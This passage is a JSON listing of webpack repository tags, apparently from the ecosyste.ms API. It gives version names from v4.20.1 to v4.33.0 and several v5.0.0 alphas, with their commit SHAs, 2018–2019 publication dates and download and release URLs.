{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/reposito